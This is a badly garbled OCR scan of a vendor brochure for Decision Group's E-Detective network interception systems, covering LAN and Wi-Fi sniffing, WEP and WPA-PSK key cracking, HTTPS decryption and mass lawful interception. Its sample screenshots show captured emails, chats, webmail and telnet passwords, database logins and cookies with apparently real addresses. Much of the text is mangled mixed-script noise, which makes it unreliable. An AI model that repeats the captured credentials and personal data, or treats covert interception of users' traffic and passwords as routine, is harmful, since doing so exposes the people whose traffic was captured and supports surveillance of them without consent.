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/E-Detective System : 
О " Ethernet LAN Internet Monitoring System, Internet Auditing, 
= Data Leakage Detection and Retention (DLDR), Record Кееріп‹ 
" Also used by Law Enforcement Agencies for Lawful Intergep 
implemented at ISP networks and International Gateways 


/tE-Detective Data Guard System 
j Q ^ ™ Monitor Transactions of Heterogeneous Databases 


(MySQL, MS SQL, Oracle DB, DB2, Syba 
"^ Monitor Windows CIFS activities - MS 
File Sharing Activities. 

“= Monitor Internal Mail Servers Sent/Received - POP3, S 


^ E-Detective Data Retention & Management Syst 
" Archived backup data from E-Detecti ^ ^^ -+- -- 
ъ= Review, search and query backup da! з 


Decision Group 


" |ntercepting Ethernet LAN HTTPS Traffic such HTTPS Gn 
including HTTPS username and password. (^ 

" Also used by Law Enforcement Agenci Чаи 
implemented at ISP ne С ји 


== ai 


" Archived backup data from E-Detective Syste 
" Review, search and query backup data. 


" Manage Multiple E-Detective Systems, ED Backup Sefver 
EDDC with Single Login 
" Centralized беагсһ/Оцпе ШШ 


Decision Group 


Wi-Fi IEEE 802.11 a/b/g/n passive intercept м 
Target can be ап AP, a Client or entire Channel 
Capable of decrypting WEP key 


Using GPU Hardware Acceleration 
Using Smart Dictionary (Mutation; 
Using Masking (Target Brute Force 


Decision Group 


Ethernet LAN passive and active interception system 
Wi-Fi IEEE 802.11 a/b/g/n passive and active intercept 
For Wi-Fi passive interception, targets can be up to 
4 Clients or 4 Channels. 

Capable of decrypting WEP key. 

WPA-PSK password recovery (optional) using diro РУК 
Recovery System 
Decrypting HTTPS traffic including username ат Ж ШЕ: 
by active implementation in both LAN and rs 


" Capable of manually reconstructing the PCAP raw dat 
А 


~ 4 8 
је ~ Фр 7 
«2 ў; Wited Ethernet 
b XY Network 2 


Decision Group. 


»;wecision Group Product & Solutions 
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Offline Manual Packet Reconstruction Series 


^ E-Detective Decoding Centre - EDDC (ALL)/ EE 
Q " Provides Case and User Management for different Inves 
= and with different Cases. 


UE КЕ \" Parse and reconstruct pre-captured PCAP raw data Пе5 
à 


/ Forensics Investigation Toolkit - Fg 
" The only Windows Based Software Appl. AM 
= " Designed for single user usage. ne 

=. " Parse and reconstruct PCAP raw data file 427, iuafly. 


| Пн нап =ч анин 
жо ы a 


Decision Group 


Wireline Ethernet 
Interception & Real-Time 
Reconstruction Series 


= | Стела 
ы мм 


Introduction to E-Detective System 


Wireline Ethernet Internet Monitoring, 
Data and Record Retention & Network 
Content Forensics Analysis Solution 
(Real-Time Reconstruction) 


Solution for: 


4% 


* Organization Internet Monitoring/Network Behavior 
Recording 


* Auditing and Record Keeping for Banking and Finance кі 
Industry 

Сота ес регата Investigation, 

E SE ECRIRE GRP dB. BA, SEC, NASD, E- 

pisse en. ес. аага System Models and Series (Appliance based) 


User can also opt to purchase software license only from us and use their own 
hardware/server. 


FX-06 Series FX-30 Series FX-100 Series 


-= E-Detective System Architecture: 


10011001 
11 
10110111 


01 
000110 
11 
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E-Detective - Mirror Mode 


Implementation (1 


E-DETECTIVE 
Mirror Mode Implementation 
Real-Time Reconstruction 


Organization or Corporate 
Network Deployment 


VAN Router/Firewall 


irroring needs to be done on the 
Managed Switch. 


SERVER FARM 


SWITCH/HUB 


Capture - Mirror Mode 


Sniffer technology is used for capturing Internet 
traffic/packets through port-mirroring switch. 


Manage 


Ш> 


Administrator 
Another building /department/floor Management port can be connected tothe 
core switch and allow Admin to access the 
*Recommended implementation system from PC on the network 


USERS 


E-Detective - Bridge Mode 


Implementation (2 


E-DETECTIVE 
Bridge Mode Implementation 
Real-Time Reconstruction 


И SERVERS 


Bridge mode (Inline mode) where all Internettraffic will 
passthrough E-Detective.Itacts as a Gateway to all 


SERV ER FARM Internet. 


Router/ Firewall 


Administrator 


USERS 


Another building /department/floor 
* Implementation for small size network—lessthan50 online users, which do not have a port-mirror switch 


E-Detective Lawful Interception (Ш) 


Solutions 


Law Enforcement 


lutions for Lawful Interception —€—— 
Nation Wide Deployment === | 


NAS/SAN 
Storage 


et ге : $ Switch 
Y ea Access to Central Management System, Reporting, ______ IDS/ 
ouer — Intercepted and Reconstructed Content, Search. 7” Firewall 
Alert Functions etc. Pd 
Core Data Traffic 106 m А 
Switch ГТ ,SECURED | 
„ ^ PRIVATE / 
Aggregator / NETWORK / 
Distributed Taps / ~ J 
ObjectFinder  'DS/Firewall = 
N x E-Detective 
Systems 
‚ Nx E-Detective 
' Systems 
~ IDS/ EL us 
Firewall ~ ВЕ 


- - 


Switch LR 
Other ISP 
Sites/States 


NAS/SAN 
Storage 


Lawful Interception - Mass 


Intarcantion (1) 


Huge Amount of Traffic (10 G Throughput or More) 


Aggregator and Distributed Tap/Data Access 
Switch can be used to filter the captured traffic (10 G 
or more) by Domain/Subnet/IP to multiple E-Detective 
systems for real-time reconstruction. 


Max. reconstruction throughput handle by each E- 
Detective system is approximately 500 Mbps - 1 Gbps 
using hardware with RAID O configuration - 8 x HDD 
setup. 


A Central Management Server (CMS) is used to 
manage the N x E-Detective systems scattered over the 
central location and site locations. 


Data Captured (in Raw Data - PCAP format and 
Reconstructed Data) can be backup into E-Detective 
Backup Server System or NAS/SAN at the each 
location. 


CMS is made accessible secureh 


by Lawful Enforcement 
t jit ИГ геа 


Lawful Interception - Targeted IP 


* Smaller Amount of Traffic (capture and filter traffic by 
Targeted IP Addresses configuration) 


* Aggregator and Distributed Tap/Data Access 
Switch can be used to filter captured traffic (10 G or 
More) by targeted IP Addresses before providing the 
filtered raw data to E-Detective systems for real-time 
reconstruction. 


* Мах. reconstruction throughput handle by each E- 
Detective system is approximately 500 Mbps - 1 Gbps 
using RAID 0 - 8 x HDD configuration. More than one E- 
Detective systems can be deployed to handle larger 
amount of traffic throughput. 

* A Central Management Server (CMS) is used to 
manage the N x E-Detective systems scattered over the 
central location and site locations. 

* Data Captured (in Raw Data - PCAP format and 

Reconstructed Data) can be backup into E-Detective 

Backup Server System or NAS/SAN at the each 

location. 


E-Detective Sample Screenshots - 


Refresh Mail Report 


Service Category 


EMAIL 


CHAT 


FILE TRANSFER 


ONLINE GAME 


Summary 
фа POP3 
$52 IMAP 
<$ SMTP 
(са Webmail(Read) 
(ЕЗ Webmail (Sent) 
№ MSN 
са 
ҰЗ YAHOO 
A оо 

З SKYPE 
UT UT Chatroom 
< GOOGLETALK 
|Р IRC Chatroom 
i FTP 

ве Р2Р 
(Ф Online Game 
@ HTTP Link 


Total ттт: Statistical Report 


( 2009-03-30 13:46:22 ) 


Daily Traffic 
2009-03-30 


Online User List 


Weekly Traffic 
2009-03-23 - 2009-03-30 


Throughput Report Quantity 


Total Traffic 


Throughput Report 
825.895.321 КВ |, 


Quantity Throughput Report Quantity 


2009-03-30 LastDay È мем Рау Mail Report 


я РОРЗ Throughput Statistical Daily Report (KB) 
422 056 KB ' 61,204 62,396 55 545 61,853 
> » 6 
о 7 


212,780 KB 

430,035 KB 
252,787 KB 
2,184 KB 


ff! Home PAGE | S Pops | M Delete | È Search | Account List 20 
No. O 6 Date-Time Account Sender Receiver cc Subject Size Simila Whol 5 5 
4m pe, fyy Mailer Daemon@y L3 ENTER 3 H t [May Infected] Май de... 10869к [Cl 2, 09 KB lih. 
20 0 20020338 vic decisiongseed.n.. vc Gdecision co. ду © t Fwd:Fw: 02School polic. ом TQ 
3 p pg буу vic@decision.co енене 6 3 19 e Fw: O4other informatio... 93135K [C] § 31 KB ІШ, 
4 Hg 21020328 ћу ейнесіней163.. |у decision c king0613@y. 3 ta Fw06block потат... 20525K 1 A МБ КВ ІШ 
5 m 8 bog flyy detective) 163 Konan : king0613Qy.. Ё 9 t4 Ғи:05Тһозе amested-5.. 8678K 1 9, 
6. Г 8 rM flyy casper.kan@msa WypdacisonE кїпд0613@у. 3 Я p) Fw: 01погіһет lights 7824K [d 3 92 KB Mil, 
7 1 8 A flyy casper.kan@msa fiyyGdecision.c king0613@y 3 H ыРи: 05Those arrested-0... 202 76K [C] — 68 KB ІШ 
8 Г @ 200202320 flyy vincentyaoQ deci vic@decision.co. decision@d сар UJ га ER. Е 8710K ПД Д4 
9. 8 ing flyy peter decision | НИ Р а о азан 318k А & 0 KB Ж 
38 |". 5 epu peter — rickwangQdecisi.. — peterQudecision ара [Bug 1255 amit. зак [4 Al OQ КВ ІШ 


Homepage - Top-Down Drill to Details 
Reporting 


E-Detective Internet Protocols 


Supported 


(ГЕ Yahoo! Singapore -Wi lorer 


VY [E htt yahoo.com/?p=us 


File Edit View Favorites Tools Help 


ү Favorites "уә Yahoo! Singapore САЛ ДЕ 


"YAHOO! f G M i Welcome to Gmail 


A Google approach to email. 


Web| Images | Video | News | Directory 


Search: | мер Search 


intuitive, efficient, and useful. And 


Sign in to Gmail with your 
Google Account 


Ө! yahoo.com m—"— Em 
Username: | 


ord: 


um Check your mail statu. 
Q Astrology R Ы hi 
= 'emember me on this 
@ Finance Ба рше. 
z Ь | өтіп | 
5. my account 


ee and easy 


sount » 


New features! 


MSN, ICQ, 
ОО, IRC, File Transfer 
FTP, P2P 


Etc.) Others 
Online Games 
Telnet etc. 


5 (Ээ BitTorrent 


Sample: Email (POP3, SMTP and 


Date-Time 


ü 2009-02-01 
14:39:24 
2009-02-01 
14:39:24 
ü 2009-02-01 
14:39:24 
2009-02-01 


Ө FW: Football: Australia makes bid for 2018 World Cup - Thunderbird 


Account Sender 


frankie — frankie@digi-fo... 
frankie 


frankie — frankie@ed-syst... 


decision@ed-sys... 


Receiver 


B 
frankie(Q digi-fo... 


B 
frankie@ed-syst... 


B 
frankie@ed-syst... 


File Edit View Go Message Tools Help 
5 ш о . X S. 
Get Mail Write Address Book Reply Reply All Forward Tag Delete Junk Print Ba 


From: frankie <frankie@ed- 

Date: 2/1/2009 2:38 PM 
То: frankie@ed-system.s: 

Cc 


stem.sq> 


frankie@digi-forensics.com 


= Subject: FW: Football: Australia makes bid for 2018 World Cup 


Cup 


nations by Monday 


Cup,” Lowy said in a statement 


Initial expressions of interest to Fifa, the world governing body for the sport, are requird 


“We have submitted Australia's expression of interest in hosting either the 2018 or 202 


Football: Australia makes bid for 2018 World 


MELBOURNE: Australia have formally lodged their bid to host the 2018 or 2022 Fifa W| ud | 10. IS 
Federation Australia (FFA) Chairman Frank Lowy said Sunday 


Whois 


Archive 


is Domain Suggestions Premium Domains Web Search DNS 


CC 


д Г1 [е] FW: U.S. needs |гап&#0... 


frankie@di... 


frankie@di-.. 


=> 


Ду 


Src IP :122.116.65211 


Subject Size 


823K O а 


07 [3 FW: Govt rejects ultim... 172.85K ІСІ а 


: Football: Australi... 126.43K [Cl 


Hostname query IP query 


Whois query Whois query 


Google Map Google Map 


frankie@di... 


frankie@di... 


Dst IP :192.168.1.33 


Hostname query 


Whois query Dst Host : Whois q 


Google Map 


Query Result 


wedetectiv... 


Whois Index IP Index FAQ 


Information | Suggestions | Premium Domains 


Who.is Search 


DNS Records 


Premium. 


ins Avallable for Purchase at name.com: 
MaxCD.com 5438800 МахМусо 


(info? call: 866-830-6479) 
m$3188.00 MaxAccessories.com $1788.00 МахАЛесі сот 


18218800 МахАпусот $3288.00 MaxAporaisers со 


TLD Availability" 


Language.doc pcd hwz cp: 


. hp. 52000 jpg 


Ads by Google 


Singapore Dating Site 

Meet Singapore Singles Near You. 
Browse Photo Profiles. Join Free! 
www.SingaporeLoveL i 


Available Domains 


Www Single Sg 
Local Singles looking for honest 
Relationships. Test be2 Now! 


inks.com www.be2.sq 


Registry Whois 


SGNIC WHOIS Server 


The following data is provided for information purposes only. 
Registrar. IP MIRROR PTE LTD 
Registrant STARHUB LTD. 


Domain Name: МАХОМИМЕ. СОМ 56. 
Creation Date: 10-Dec-2002 18:30:11 


[V] тахопіле us 
Buy Мом $8.99 at name.com 


Business PushMail 

‘Secured, wireless solution for 

о oval an dt 
starhub. iz pushmail 


name.com + Google 
Every domain name now comes 
with select Google Apps FREE! 
* Personalized Email 
к 
+ Custom Start Page 


+ Web Раде Creator 
* And More! 


Google 


P: HOST : 122-116-65-211.HINE 


1221166521 —— IP.hinet net 
Whois query Whois query 


6 Mtp. decon com tw/pmaph map php mapio- Ores OD: QDNAPzglOLivPFATPOwAOZAOEATZSOSOFODw7O - Windows temet Explorer 


This location by IP : 


Web Mail (Read and Sent) 


BCC Webmail Similar 


Но. [7] ÜDate-Time Account Sender Password Receiver CC Subject 
Type Search 
2008-07-02 B ыы 22 > | 
* 10:28:17 192-168.1.11 frankie.decision@gma... decision@ed-... 42% [3 Bush GMail 
— p 2008-07-02 B RERUM > у 
2. [18 10:27:24 192.168.1.11 frankie.decision@gma... support@ed-s... 1-3 [3 UN finds world econo... GMail _ 
3. pj 2008-07-02 195 168111 2 st cupport@ed-s._ 42% М Africa Windows Live 


10:25:28 wedetective2(g hotmail... 


4. [7] d Æ esun1921681060/general/common/msiopenweb.php? TYPE-3. AUTO-125 - Windows Intern... C= Эа Зав іе десі... +23 М UN agency hails gree... Windows Live [С 


= 
Га, 

[a 

FROM : frankie.decisiong gmail.com E 
= "nt m 
T 

[a 

[Cl 

[a 


5 | DATE/TIME: 2008-07-02 10:27:24 
О „540001 O@ed-system.sg 
т SUBJECT : UN finds world ecORegnic i 
6. 1 ds . YAHOO Май 
\] АТТАСНМЕНТ: |1- Sieg 
€ | 
ra UNITED NATIONS - RICH and poor nations have more in common this year: a growing sense of | | YAHOO Mail 
economic insecurity. 
8. ШШ Their shared anxiety is largely due to 'trade shocks' from rising oil and food prices, rattled financial wit Y 
markets, natural disasters and armed conflicts, the UN said in its annual survey of world economic 
and social trends, released on Tuesday. А улла МА ММ \ А 
etective1... S GMail 
w- 
As usual, though, it's the impoverished who fare worse. 7 талл E i SINGA ORE МАЕ = 
мч 1 mm иш 


" 5 = Page 1 Current Раде 1 
"The food riots that broke out in a number of countries in early 2008 have laid bare the fragility of М > 
economic livelihoods for those at the bottom of the development ladder.’ the report says. қ. 


1 


Mr Sha Zukang. ће U.N. undersecretary-general for economic and social affairs. suggests nothing 
less than 'a global New Deal' or Marshall Plan-like approach to help the world's poor, especially the 
1 billion people who live on less than USS1 (S$1.36) a day. 


Under that plan, nations would set aside cash grants that nations could pay to each household. 
something along the lines of the dividends paid to Alaskans each year since 1980 from oil and gas 
money. 


‘Such measures are. of course. fraught with complications and difficulties.' he savs in the report. 


Webmail Type: Yahoo Mail, Gmail, Windows Live Hotmail, Giga Mail 
and others 


Sample: IM - Yahoo, MSN, ICQ, IRC 


№ MSN | Ж Delete |Ә. Search | :SAccount List 


User Handle 
diesis@ms62_hinet.net 
diesis@ms62_hinet.net 
diesis(ms62 hinet.net 

3% shmily.d0613@msa_hinet.net 

3% shmily.d0613@msa hinet.net 

3% shmily.d0613@msa hinet net 
38 wedetective@hotmail.com 


3% wedetective2@hotmail.com 


No. O Date.Time Account 
2008-09-22 
9. ее МСЛЕ5Т 
= 2008-09-22 
10. in 09:32:21 + VC TEST 
2008-09-22 
5 O 109-1059 УІСТЕЗТ 
z= 2008-09-22 
12. O 8 09:40:59 FLYY 
2008-09-22 
13. 09:10:59 FLYY 
2008-09-22 
ч. o 10:21:09 FLYY 
2008-07-02 
15. 6 2104393. 192168143 
6 m g 70080702 FRANKIE- 
Am 10:43:23 PC 
мч 123 њи Етег Раде |___|__бо _ | 


ce Friend List:shmily.d0613@msa.hinet.net 


Every Page сент] 


= 
o 


Account 
tw8@S5floor.com 
mimo360@gmail.com 
sheaman@ubbn.net 
decision-vincent@msn.com 
tigecici@msn.com 
yunlin0217@msn.com 
boni756m@pchome.com.tw 


1 
2 
3 
4 
5 
6 
7 
8 


poeuta@hotmail.com 


412345678 mmEnter Page| | Go | 


Nickname 
FABRA 


mimo 


cryin iFAR RT -- 


Total 61 Total Page 8 Current Page 1 


Participants 
dick691111@yahoo.com.tw 
she0430@hotmail.com 
3% shmily.d0613@msa_hinet.net 
diesis(0ms62 hinet.net 
philip12129(ghotmail.com 
dick691111@yahoo.com.tw 


43 wedetective2@hotmail.com 


УЛ Date-Time : 2008-07-02 10:40:06 | User Handle : wedetective1 


Every Раде 3] onim ] 


rou Similar 


Conversation 
Search 


+Conversation 20 
+Conversation 11 
+Conversation 48 
+Conversation 48 
+Conversation 8 


Conversation 28 


Айддйд д д 


^ Export | Every Page :[ 20]| Confirm 


No. Date-Time 
2008-07-02 

10:40:06 
2008-07-02 

+ 10:40:07 
2008-07-02 

ё 10:40:09 


User Handle Type 


1 wedetective2 Message helo 


wedetective2 Message good moming 


wedetective2 Message how ru? 


2008-07-02 
10:40:19 


5 wedetective1 
2008-07-02 


Message hi 


wedetective1 Message | am fine 


wedetective1 Message thank you 


^ 
2008-07-02 4 i 
pas wedetective File é 
MI > 


2008-07-02 
> 10:40:55 
2008-07-02 


File | Customer Request Form. pdf 


wedetectivet 
wedetective1 Message thank youll! 


wedetective2 Message welcome 


wedetective1 Audio e 
20:55:48 wedetective1 Audio 
2008-10-12 
20:55:48 
2008-10-12 


wedetective1 Audio 


wedetective1 Video 


Time started Finish Time ^ 


2008-07-02 2008-07-02 
10:41:28 
2008-07-02 
104128 || 

2008-07-02 
10:41:02 10:41:28 
2008-07-02 2008-07-02 _ 


Total 15 Total Page 1 Current Page 1 


2008-07-02 


Sample: File Transfer - FTP 
load/Download 


U 


№. || Date-Time Account Username Password 

2008-07-02 FRANKIE- 
33. 10:36:22 PC anonymous lIEUser@ 

— 2008-07-02 FRANKIE- 
34. Г 10-36-14 РС anonymous ЈЕ зе @ 
35. — ыы anonymous ІЕ егі) 
36. P 2( File Download 
37 2 Do you want to open or save this file? 
| Name: DSN-3200-10 ds.pdf 

38. 2 рм Type: Adobe Acrobat Document, 350KB 

2 From: 192.168.10.60 
39. 
40. 1 2 

«123 ж. While files from the Intemet can be useful, some files can potentially 
[?] harm your computer. If you do not trust the source, do not open or 
У  savethis file. What's the risk? 


Action 


Download 


Download 


Download 


FTP Server IP File Name 
64.7 210.151 DWA-642 ds.pdf 
64 7.210.151 -3200-10 ds.pdf 


DWA-140 ds.pdf 


Eile Edit View Document Tools 


Window Help 


Similar 
Search 


д 


/3 =) m 358% + 


Bae ee: 


VOIP-DETECTIVE 


Capable to capture, decode and reconstruct 
VOIP RTP sessions. 


* Supports SIP and H.323. 


* Supported CODECS: G.711-a law, G.711-u law, 
G.729, G.723, G.726 and ILBC. 


Capable to play back VOIP sessions. 


Whols 


Sample: File Transfer - P2P File 


Send Receive 


M ад Lus em —— Throughput Throughput Detail gii 

20081013 папке BitTorrent BOSON Netsim for CCNP 7 М... решава 10840 148М Detail ГА 
Я 20081013 папке LimeWire/4.16.6 Воп Jovi - You Give Love _ gie ов 343 реја ГЇ 
m 7008092 192.168.1.11 BitTorrent Not Available "e 1.41M 11.75M раја ГО 


мч 1 »» ve Чї | @p2p|192.168.10.10 


=> Date-Time: 2008-10-13 08:07:43 | IP: 192.168.10.10 | File Name: [BOSON Netsim for CCNP 7 NEWEST 100% WORKING ( cisc 


Date-Time Action Р-ІР Роп 
2008-10-13 08:07:43 Download 75.64.216.60 60544 
2008-10-13 08:09:20 Upload 74.213.65.175 60545 
2008-10-13 08:10:35 Upload 72.11.16.150 60814 
2008-10-13 08:13:31 Upload 92.125.81.31 60805 
2008-10-13 08:14:35 Upload 90.154.220.26 60747 
2008-10-13 08:14:54 Upload 75.49.110.71 60842 
2008-10-13 08:16:26 Download 83.110.223.51 60764 
2008-10-13 08:17:11 Download 67.10.145.51 60550 
2008-10-13 08:17:20 Upload 72.139.109.160 60798 
2008-10-13 08:20:21 Download 74.213.65.175 60818 
2008-10-13 08:23:34 Upload 90.154.220.26 61048 
2008-10-13 08:23:35 Upload 96.232.199.101 61537 
2008-10-13 08:23:53 Upload 83.110.223.51 61316 

Total 13 Total Page 1 Current Page 1 


z 
o 


1. 
2. 
3. 
4. 
5. 
6. 
7. 
8. 
8 


Supports P2P such as Bittorent, eMule/eDonkey, Fasttrack, Gnutella 


Sample: File Transfer - Windows 


No. Г Date-Timet Account Username Action? Server+ Path File Name sizes Similar Whols ^ 


Search 
1. Пп pecore Chihtung Chihtung Download 192.168.1.111 PUB\staffineoyuxxx\ lanbypass.tgz 13.05K ГА a 
2. 20120107  Chitung ^ Chitung ^ Download 1921681111 — PUBIstaffineoyuxxx\ lanbyphss.tgz 1305K A 8% 
3. 8 oe Chihtung Chihtung Download 192.168.1.111 PUB\stafflneoyuxxx\ |апбурћав 192 13.05K M a 
4 n pied Chihtung ^ Chihtung Download 192.168.1.111 — PUB\staffineoyuxxx\ lanbyphss.tgz 130K |1 @ | 
5. m 20120197 осынша ^ Chittung ^ Download 192.168.1.111 – PUBIstaffineoyuxxx\ lanbyphss.tgz 13.05K AQ 
6. 20120197 Chiung — Chihtung Бои 1305к A 
7 m ЭК. Chihtung Chihtung Dol | Eile. Commands Tools Favorites Options Help 13.05K T а, 
8. 20120107  Chihtung ^ Chihtung Бо 9t ANE | © 6) [99 i ва па ai в 1305к 1 d 
9 в т. Chihtung Chihtung Ро Æ o S 13.05K [a a 
1. п 21585 “ош cmm —— rc——X 808 |1 4 
n". ш “. Chihtung Chihtung =й ||; lanbypass File folder 16/11/2011 9 mpm m à 
12. 20120107 орша ^ Chihtung Dol 1305Kk A 4 - 


i««123456 »»EnterPage| || бо | 


9 Total Page 6 Current Page 1 


Total 1 folder 


Supports Windows File Sharing Logs and Reconstruction - Tapping point must 
contains these data transfer. 


Sample: HTTP (Link, Content and 
Reconstruction 


Confirm 
^ 


No.Date-Time Account Referer Content 


2003-01-01 | 
T 01:13:59 wedetective2 1 Elwww.google.com.sg/ 

2003-01-01 : а БЕЛЕР 
2. 01:13:45 wedetective2 0 [lstatic.ak facebook. com/common/redirectiframe html 
3. prece wedetective2 0 [-Jstatic. ak facebook. com/common/redirectiframe.html 
4. 2003-01-01 wedetective2 0 Fistatic ak facebook .com/common/redirectiframe.html 
5. E wedetective2 0 [ммм facebook com/ajax/profile/tab. php?id-221100481476&v-photos&href-&iframe-true&nctr?65B іа%50=1& log src tab п... = 
6. а wedetective2 0 [lwww-facebook.com/ajax/profile/tab. php?id=221 1004814 76&v=info&href=&ifframe=true&nctr%5B_ia%5D=1& log src tab пат... 
T. pos Е wedetective2 38 . [млм facebook. com/pages/E-Detecijve/221100481476?ref-ts 
8. pect! 01-01 vedetective2 0 — [10.channel06 facebook.com:80/ifranfe/10?r=http%3A%2F%2F static ak focdn.net%2Frsrc. php%2Fz24KTI%2Fhash%2F tvifamrg.j ... 
9. 200° 542060594 
ee |BA%2F%2F static.ak.focdn.net%2Frsrc.php%2Fz4KTI%2Fhash%2F tvifqmrg.j ... 
г "— ЕШ 

200 Wall Info Photos Discussions e жоюн» 
12: 01 — - A%2F %2F static.ak fbcdn.net?62Frsrc.php9?62Fz4KTI962Fhash962F 1vifqmrg.]j ... 

- ~ Break Free in Macau x 

et = 
gai FBS PU e naa paroa Total 32 Total Page 2 Current Page 1 


brand created by Decision Group lunch daily and spending 
" money! 


Like 


Information 


Founded 
Decision Group January 11 at 10:09pm * Comment Шке » Share 


-— ЄЎ E-Detective E-Detective SBIR R&D Awards 
Fans 
6 of 7 fans eu К 4 ^ 


Brighten your Smile x 


HTTP Web Page 
Eee reconstruction through 
proxy service 


Le Chat 


fà» %10% + 


@ Internet | Protected Mode: Off 


Sample: HTTP Web 


Jl pload = 
po су(е С cr: 


mS oad | Ж Delete | & Search | Rule Set Every Page :| 20]| Confirm | 


File Similar ^ 


No. [7] Date-Time Account Action File Name URL Sing Somn | 
1. prong frankie Download E] CCNA torrent http://isohunt.com/download/31... 11.06K ГА 
2 P о. frankie Download Г1 Hu 081011Int Soccern... http://dmcom.espn.go.com/motio... 720M (9 
3. pus frankie Download [1 Hu 081011Int Soccern... http-//static espn.go.com/moti... 261K А 
4. m pecia tg frankie Download [3 sg ing 730х355 flvh..  http///richmedia.yimg.com/cust... 739.33K ГД 
5. Ш pork frankie Download [* sg ing 730x90 Яу...  http-//richmedia.yimg.com/cust... 171.22K [A | 
c. m 20080702 192168111 Upload [1 SIA jpg http://mail.google.com/mail/2u... 2321K [A 
2008-07-02 - "me | 
7. 102724: 192-168-111 Upload Ы SIA jpg : o com/mail/? 52B ГА 
| 2008-07-02 — 495 168111 I SIA jpg ше Be” Nu $5 Әке: Bee т o [A 
: MEN 
File Download ~ 3 
ов |< 
Do you want to open or save this file? ГІ, 
208 д = 
Мате: SIAjpg | ЕЙ | 
Type: ІРЕС Image, 23.2КВ i T 67.07K ГА 
me 192.168.10.60 МАМАМ OSSA, У 
: 1 ДЕН EM МАЛЕ = - 168 Г 
| 57B ГА 
While files from the Intemet can be useful, some files can potentially singapore 1 pg 0B [A - 
harm your computer. If you do not trust the source, do not open ог = " 
save this file. What's the risk? al Page 4 Current Page 1 


Sample: HTTP Video Streaming (FLV 


> | Б | a | @% J 
~ у S = М = Bs 
OBSOGBSCO@EGeCCCOG % 
"Sif video Stream | № Delete | & Search Every Page:| 20|| Confirm 
ту Fag 
No. | Date-Time Account HOST File Name URL io IJ 
Size Search 
2008-10-13 : TOR ЖТА 

2 | 07-39-42 frankie static.esp... Hu 081011Int Soccern http-//static espn.go.com/moti 2.61K 

3. [Е —— frankie richmedia... +59 ing 730x355 flv.h http-//richmedia.yimg.com/cust 739.33K А 

4. Р] pose frankie richmedia.... 154 ing 730x90 flv.hi http-//richmedia.yimg.com/cust 171.22K ГА 

в, | prophets frankie v.mccont.c... +[From www.metacafe.c... http-//v mccont.com/ItemFiles/ 188M ГД 

2008-10-12 » ee 
6. Г] frankie v.mccont.c.. [From www.metacaf ge... http://v.mccont.com/ItemFiles/... " 863 43K ral 
as Playback of Video File 

1m 2008-10-12 franki | = Е «быр am ГЇ 

. | 20:49:00 rankie v.mccont.c.. [From www.metacafe с. ttp://v.mccont.com/ItemFiles/ | 1.37M _ IC 

8. [7] pops папке | v mecontc.. [From www.metacafe (| @ https¥/192.168.10.60/general/common/http/player.... | > || 2] (вези) | 534 78K |71, | 

a 192.168.10.60 Е 

9. Е 2, frankie — v.mccont.c.. [From www.metacafe.d 508.67K ГД 

10. © м: frankie _ v.mccont.c.. [From www.metacafe.q 180M ГА 

11. [Fl pet frankie — dmcom.espn...4Hu 081009Int PressPas 20.83M ГА 

12. Г! phis frankie static.esp... Ни 081009Int PressPa 159K ГД 

— 2008-10-12 : . т 

13. [Е] 20:45:37 frankie clips.thes... Ур ер06 Яу 114M ІП 
м. г} 20081012 апе зіайсевр.. :Hu 081009і, РтезеР4 159K T 

15. pp 70080127 frankie _ staticesp.. Ни 081011 Soccen 261K М ~ 
мч 1 юм 20:25 |?" |41 Current Page 1 


Video Stream (FLV format): Youtube, Google Video, Metacafe. 


Sample: HTTP Request (GET & 


Мо. E Date-Time Account Action URL Similar Whols 
1. Г 2009-09-21 12:04:18 frankie GET  thttp://sg.yahoo.com/s/269308 а а 
2. Г] 2009-09-21 12:04:18 frankie GET  ihttp//sg.yahoqlcom/p.gif?t-1253505895& ylp-A3xselln7ZKas0 .. ГА а 
3 Ш 2009-09-21 12:04:01 frankie GET  thttp://sg.yahod§com/s/269375 а а 
4. Г] 2009-09-21 12:03:48 frankie GET +һір://ѕ9.уаһофсот/?р=иѕ ГА, а 
Ii «1» Total 4 Total Page 1 Current Page 1 


@ https//192.168.1.13/general/common/http/http original.php? filezLzxQbmt9625252Ba30vPFABOjpDOKMS - Window... (2:12:08) 


СЕТ /5/269375 НТІР/1.1 
Accept: */* 
Referer: http://sg.yahoo.Ccom/?p-us 
Accept-Language: en-sg 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Еоху/ 1; SLCCl; „МЕТ CLR 2.0 
Accept-Encoding: gzlp, deflate 
Host: sg.yahoo.com 


Connectlon: Keep-Alive 
Cookie: Y-v-1&n-aslbl3nhshaa8&l-9kl4djki 8jÜ/o&pem21wvemy113000500&jb2241701&12z275450&r- 7h&lg-en-US&intl: 


Sample: Telnet Session (with Play 


Visibility Group : ALL 


GTelnet | фррејеје | A Search Every Page : ЕСЕСІ 
No. E Date-Time Account User Password Server Record File Siz 

1 lafa188 lafa1965 140.112.172.11 121.37K l а, 

2 n new yes 140.112.172.11 189.25K [7 + 

3 lafa188 lafa1965 140.112.172.11 121.37K ГД a 

4 Bn 467K [7 а 

5 5 462K [7 a 

6 n 18925K С 4 | 
т mn 121.37K ГА а, 

8 n 467 Ч а 

9 m 462K [3 — 

10 $ 18925K 4 4 

11 | 1213K M § 

12 m 5 4e 14 & 

13 462k [3 а 

14 121.37K ГД a 

15 E 18925K |10244 

16 4e A 4 - 
ЧН 123456789 »» Ent Total 189 Total Page 10 Current Page 1 


Sample: VoIP Calls (with Play Back) - 
Optional 


та 


&J VOIP | f Delete | A Search | Upload 


Every Page[ 20 
NO. | Date-Time Account Caller Callee Mode Type Codec File Name Time 
1. 9 192.168.6.8 88610044407 818610000104 peer to peer SIP 6723 VOIP VXdHcR.wav 10 Sec 
2. ан 192.168.1.132 818610044420 818610044421 peer to peer SIP iLBC VOIP_i9d6zK wav 58 Sec 
3. [Fl pow 192.168.1.132 88610044420 118610044421 peer to peer SIP G729 VOIP HKr7PR.wav 50 Sec 
4. Бана: 192.168.1132 2861000080 VOIP DNiQFrwav 1 Min 3 Sec 
5. М Er 192.168.1.132 886100 VOIP JKofpkwav 1 Міп 2 Sec 
I C 1 » 


otal 5 Total Page 1 Current Page 1 


Play back of reconstructed VoIP audio file using Media 
Player 
Support SIP/H.323 ВТР Codec such as G.711a-law, G,711p- 
law, G.726, G.729, iLBC 


Sample: Database Logging 


се SQL | MDelete | раз Hide | А Search | 


Password 


No. ©  Date-Time* Account Username 

1. = 20120107 1921681170 sa 313131313131 192.168.1.131 
2. п 29120107 19214681170 sa 313131313131 192.168.1.131 
з т 20120197 1921681170 sa 313131313131 192.168.1.131 
